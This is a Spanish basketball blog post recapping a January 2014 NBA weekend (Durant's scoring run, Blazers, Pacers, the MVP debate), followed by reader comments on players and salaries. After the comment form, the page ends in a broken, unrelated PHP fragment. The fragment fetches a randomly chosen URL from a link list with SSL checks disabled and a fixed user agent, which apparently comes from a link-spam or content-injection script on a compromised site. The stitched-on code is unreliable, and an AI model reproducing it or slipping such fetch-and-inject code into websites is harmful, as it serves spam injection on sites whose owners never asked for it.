Informe del fin de semana: Abusón Durant

20 de January de 2014 por TheDeerHunter

Completísima cobertura informativa la que nos habéis brindado. Prácticamente no ha quedado ningún tema sin tocar e incluso nos habéis leído la mente centrando vuestra atención en los grandes nombres de la NCAA. Nuestro primer Mock draft va a llegar muy pronto. Estad atentos.

Avisábamos que podía ser un fin de semana intenso y no ha defraudado. El viernes vimos alguno de los mejores partidos de lo que llevamos de curso.

Por encima de todos el intercambio de golpes entre Warriors y Thunder. Por encima de los 250 puntos… telita.
“Los Warriors defienden bastante mejor de lo que parece para tener a jugadores como Curry o Lee por ahí. De hecho en términos de eficiencia defensiva son sextos de toda la NBA. Otra cosa es que se pongan a ello cuando les da la gana. Pero si viene Durant a hacer la mayor exhibición ofensiva de la temporada lo tienes crudo. Metió una bandejita fácil pero el resto las enchufa de todos los colores y la mayoría son tiros punteados o acciones con dos tios pendientes de él. Brutal.” rumbero
En efecto, si el señor Durantula habitualmente es el Ángel exterminador de la liga, en esta ocasión lo fue más que nunca. Récord personal en 54 puntos con un nivel de acierto intimidatorio. Resulta preocupante que su equipo a estas alturas necesite una versión tan potente como la que viene ofreciéndonos para ganar apurados los partidos, pero están logrando cubrir razonablemente bien la ausencia de un pilar tan fundamental como es Westbrook.

“Buenooo, y se me ha olvidado comentar el partidazo de la jornada. El Spurs-Blazers con victoria para los visitantes en un igualado encuentro que Matthews con 3 triples en los últimos 4 minutos se encargó de romper en favor de los de Oregón.” Denise
Puñetazo en la mesa de los Blazers recuperando el liderato de conferencia en San Antonio y ante unos locales en modo crucero. Si alguien dudaba que van en serio esta puede ser la prueba definitiva. Teniendo en cuenta los problemas que vienen sufriendo sus perseguidores todo apunta a que al final de la regular el trono del oeste quedará en manos de uno de estos dos equipos.

Aguantaban momentáneamente el paso los Clippers, con Blake Griffin añadiendo su nombre a la lista de los jugadores visitantes que se lucen en el Madison. Todos los años hay un capazo de ellos.
También vimos una importante victoria de los Mavs en Phoenix, con Shane Larking de sorprendente protagonista. En frente Dragic a un nivel altísimo, pero cuidado porque los Suns empiezan a verle las orejas… al oso. Los Grizzlies ya están ahí. Ganaron, con polémica a Kings, sumando 5 seguidas.
Por su parte los Nuggets volvieron a demostrar su desesperante irregularidad perdiendo en casa ante Cavaliers y Minnesota su crónica apatía en Toronto. Quién les ha visto y quién les ve.

En duelos interconferencias hubo dos que atrajeron particularmente vuestra atención: La exhibición de los Jazz y Burke en Detroit y una de las victorias más intrascendentes de la historia de los Lakers en el Boston Garden.
“En cuanto a Trey Burke ojo! porque yo creo que al final va a disputar el ROY a MCW si sigue a este nivelazo, Lo de menos son los números de ayer, lo mejor es que lo hizo todo en la segunda parte. Estuve viendo el partido y al descanso llevaba 4/5 puntos sólo y fallando mucho tanto de cara al aro como en la dirección porque en el primer tiempo yo creo que perdió por lo menos 5 de los 7 que perdió al final de partido… En la segunda parte fue un espectáculo verlo jugar” Simon
“Señores, Rondo ha vuelto. Esperemos que su salud se mantenga y no se sume a la lista de los Rose y Bryant… Primer partido, derrota contra LAL con algo más de 19 minutos en pista. 8 pros. 4 asistencias 2 robos. El partido… De ir ganando casi todo el partido hasta perder de 3. Por cierto, algo de polémica al final del partido con un salto entre dos donde el balón sale fuera (parece que es Johnson quien lo toca) y en el segundo salto gana el balón LAL para perder tiempo. Rondo se jugó el triple final que podía dar el empate, y llega a tocar aro… ” Franitis

Cerrando el viernes, en el este, los Heat rompieron su mala racha en Philadelphia; Al Jefferson abusó de unos Magic que sumaban 10 derrotas seguidas y los Wizards lograron doblegar a unos combativos Bulls para alcanzar por fin el 50% de victorias (momentáneamente)

Sábado…

“Se acabó. Al final los Clippers maquillaron algo el resultado y “solo” perdieron de 14, pero el baño ha sido rotundo. George y Stephenson colosales, y una tela de araña en defensa que no ha dejado respirar al ataque y a la circulación de balón de los californianos, cuyos porcentajes, especialmente en tiros exteriores debe haber sido horrible.” Denise
Los Pacers, como comenta nuestro compañero, asfixiaron a todo un gallo como los Clippers, demostrando que ahora mismo hay muy pocos rivales que realmente puedan inquietarles. Alguien lanzaba la cuestión del MVP para Paul George y no cabe duda de que debe de estar en la terna de candidatos… aunque viendo ahora mismo el nivel de Kevin Durant, es difícil pensar en nadie más.

Parece que ocurre lo mismo con los Blazers que alcanzaban los 104 puntos sólo al final del tercer cuarto en Dallas y terminaban con 127. Los Mavs se dedicaron a maquillar en el último y poco más.

Houston y Warriors cumplieron, los primeros ante Bucks con Terrence Jones estelar y los Warriors ante Pelicans que acumulan 8 derrotas consecutivas en esta campaña plagada de calamidades. Extraordinario partido de Anthony Davis, por cierto, que últimamente le tenemos un tanto olvidado.

En el resto de jornada los Heat necesitaron prórroga para ganar en Charlotte, el juego interior de los Bulls arrasó a los Sixers y dos equipos decepcionantes como Pistons y Wolves lograron ganar (ante Wizards y Jazz respectivamente)

Finalmente anoche vimos la remontada de los Lakers en Toronto, Durant volvió a deslumbrar ante Kings (7º consecutivo por encima de 30, más 9 asistencias, 6 rebotes, 4 tapones, etc, etc…) Frye anotó 30 en la victoria de Suns ante Nuggets, y los Spurs ganaban fácil a los Bucks con Patt Mills de punta de lanza. Orlando también rompió su pésima racha ante Celtics.

¡Eso es todo amigos!

Comenta

17 comentarios a esta entrada

  1. Mamba_Blanca dice:
    #1

    Lo más impactante de Durant, ya no son las cifras de anotacion, sino el porcentaje de acierto. Anoche consiguió 30 puntos con un 10 de 15 en tiros.
    Si sigue en este modo destructor, yo creo que el MVP será para él. Paul George tambien está haciendo un temporadón, pero la liga, a dia de hoy, empieza a deberle el MVP a Durantula.

      Citar

  2. rumbero dice:
    #2

    Mamba_Blanca:
    Lo más impactante de Durant, ya no son las cifras de anotacion, sino el porcentaje de acierto. Anoche consiguió 30 puntos con un 10 de 15 en tiros.
    Si sigue en este modo destructor, yo creo que el MVP será para él. Paul George tambien está haciendo un temporadón, pero la liga, a dia de hoy, empieza a deberle el MVP a Durantula.

    Durant está para el MVP, pero ojo que el año pasado a estas alturas andaba como favorito y vino James con ese mes de febrero en modo dios tirando por encima del 60% y haciendo barbaridades… que Lebron es muy cansino. A George (y mira que soy fan devoto) lo veo un peldaño por debajo de estos dos para el MVP a día de hoy.

    Recordar que hoy es el Martin Luther King Day y vamos a tener partidos a partir de las 19.00 que no está nada mal. Pistons – Clippers a esa hora y un Knicks – Nets a las 20h por ejemplo.

      Citar

  3. Schize dice:
    #3

    Yo también opino que George está un peldaño por debajo de Durant. Si éste mantiene el ritmo y a su equipo arriba en la conferencia debería llevárselo. Hasta ahora Lebron no ha demostrado merecerlo este año.

      Citar

  4. Mamba_Blanca dice:
    #4

    A dia de hoy:

    Durant: 30.6 ptos 7.8 reb 5.1 asist 1.6 robos (49.7% FG 39.6% 3FG 88.1FT)
    Lebron: 26.0 ptos 6.7 reb 6.6 asist 1.3 robos (58.3%FG 38.1%3FG 76.3 FT)

    A esto hay que sumarle que Lebron intenta “solo” 16.1 tiros por partido, mientras que Durant esta en 19.2

      Citar

  5. Schize dice:
    #5

    Pues ahora que pones los números… No lo tengo tan claro. Durant está teniendo que tirar de su equipo con pocos apoyos (por cierto, Ibaka desde la lesión de Westbrook creo que está sumiendo muy bien el rol más ofensivo que se le exige) pero Lebron con los continuos problemas de Wade tampoco va sobrado de apoyos consistentes.

      Citar

  6. Jordi dice:
    #6

    Hola, sabeis alguna casa de apuestas para apostar por el mvp de este año? no la encuentro en ningun sitio…gracias!!

      Citar

  7. Denise dice:
    #7

    Si Greg Monroe tiene esta actitud tan pasota siendo expiring…¿cual tendrá cuando este verano alguien le firme 60-70 millones? Griffin está haciendo lo que le da la gana con él.
    Y los Pistons deberían traspasarlo junto con los expiring de Villanueva ó Stuckey, traerse algo bueno a cambio ¿Rondo? y jugar con Josh Smith de 4, y Brandon Jennings de 2.

      Citar

  8. Denise dice:
    #8

    ¿Alguien puede decirme alguna página donde vengan los cuadros salariales de los equipos de forma correcta?

    Solía mirarlos en Hoopsworld, cuya pagina era cojonuda, pero la han cerrado, y en Hoopshype por ejemplo hay muchos errores.

      Citar

  9. rumbero dice:
    #9

    Denise:
    Si Greg Monroe tiene esta actitud tan pasota siendo expiring…¿cual tendrá cuando este verano alguien le firme 60-70 millones? Griffin está haciendo lo que le da la gana con él.
    Y los Pistons deberían traspasarlo junto con los expiring de Villanueva ó Stuckey, traerse algo bueno a cambio ¿Rondo? yjugar con Josh Smith de 4, y Brandon Jennings de 2.

    Nada, hay que quitarse de los Pistons que son droga de la mala y pasarse a los Cavs, que son peores aún para la salud pero estan a 3 depués de ir palmando de 20 agarrándose a Irving y Varejao

      Citar

  10. rumbero dice:
    #10

    Denise:
    ¿Alguien puede decirme alguna página donde vengan los cuadros salariales de los equipos de forma correcta?

    Solía mirarlos en Hoopsworld, cuya pagina era cojonuda, pero la han cerrado, y en Hoopshype por ejemplo hay muchos errores.

    http://www.hispanosnba.com/salarios/index

      Citar

  11. Denise dice:
    #11

    rumbero: Nada, hay que quitarse de los Pistons que son droga de la mala y pasarse a los Cavs, que son peores aún para la salud pero estan a 3 depués de ir palmando de 20 agarrándose a Irving y Varejao

    Pues ojo que tras ir ganando de 20, los Clippers se han confiado y los Pistons se han metido en el partido. El mamón de Stuckey si que está dando el callo para ganarse otro contrato y a vivir del cuento. Partidazos que se está marcando ultimamente.

      Citar

  12. Denise dice:
    #12

    rumbero: http://www.hispanosnba.com/salarios/index

    Gracias men, éste parece mejor, por ejemplo a Al Harrington le ponen bien en el salario en el cuadro de los Magic, en Hoopshype no. Eso sí, la leyenda son 4-5 tonalidades de azul y morado que no se distinguen muy bien. Podrían haber puesto el rojo, amarillo, verde y naranja…

      Citar

  13. Denise dice:
    #13

    Denise: Pues ojo que tras ir ganando de 20, los Clippers se han confiado y los Pistons se han metido en el partido. El mamón de Stuckey si que está dando el callo para ganarse otro contrato y a vivir del cuento. Partidazos que se está marcando ultimamente.

    Ya está, Crawford se ha sacado la manguera y ha apagado el pequeño incendio. Los Clippers ganarán el partido y Detroit debería hacer movimientos antes del Deadline. El primero, echar a Cheeks, y después aprovechar expiring valiosos como Monroe y Stuckey para traer a alguien a cambio. El partido de Greg Monroe ha sido lamentable, tanto atrás como adelante

      Citar

  14. Denise dice:
    #14

    Vaya paliza que le estan dando los Bobcats a los Raptors, y mas mediaticamente los Nets a los Knicks con JoJo que va a tener el dia bueno y si sigue así, se irá a los 35-40 puntos. Y Blatche demostrando qué es el puto amo cuando le sale de las pelotas.

      Citar

  15. rumbero dice:
    #15

    Madre mia Cleveland. Los tios lo pelean hasta el hasta el final y Ellis falla dos tiros libres con lo que tienen opción de empatar el partido con un triple a falta de menos de 3 segundos. Pizarra de Brown, un veterano como Jack para el saque de banda…y violación de 5 segundos. Esto son los Cavs.

      Citar

  16. Denise dice:
    #16

    Bonita paliza de Nets a Knicks con un imperial Jo-Jo en la primera parte, y un espectacular Blatche en la segunda.
    Hablamos de Lebron, Melo, Deng, Bosh, Nowitzki y demas como grandes agentes libres, pero ojo con Blatche que se está ganando un contratazo y a este nivel le da un salto de cualidad a cualquier equipo por el que quiera fichar.
    A dia de hoy, sin duda es el mejor jugador de toda la liga en relación rendimiento salario. (11’7 puntos, 6 rebotes, 1’5 asistencias y 1 robo en 22 minutos y cobrando 1,3 millones de dolares). Puto amo.

      Citar

  17. Jose Luis dice:
    #17

    Denise:
    Bonita paliza de Nets a Knicks con un imperial Jo-Jo en la primera parte, y un espectacular Blatche en la segunda.
    Hablamos de Lebron, Melo, Deng, Bosh, Nowitzki y demas como grandes agentes libres, pero ojo con Blatche que se está ganando un contratazo y a este nivel le da un salto de cualidad a cualquier equipo por el que quiera fichar.
    A dia de hoy, sin duda es el mejor jugador de toda la liga en relación rendimiento salario. (11’7puntos, 6 rebotes, 1’5 asistencias y 1 robo en 22 minutos y cobrando 1,3 millones de dolares). Puto amo.

    Hay un tal Kendall Marshall por ahi… xDDDDDDDD

    Blatche es un jugadorazo, y por ese precio es un lujo 🙂

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>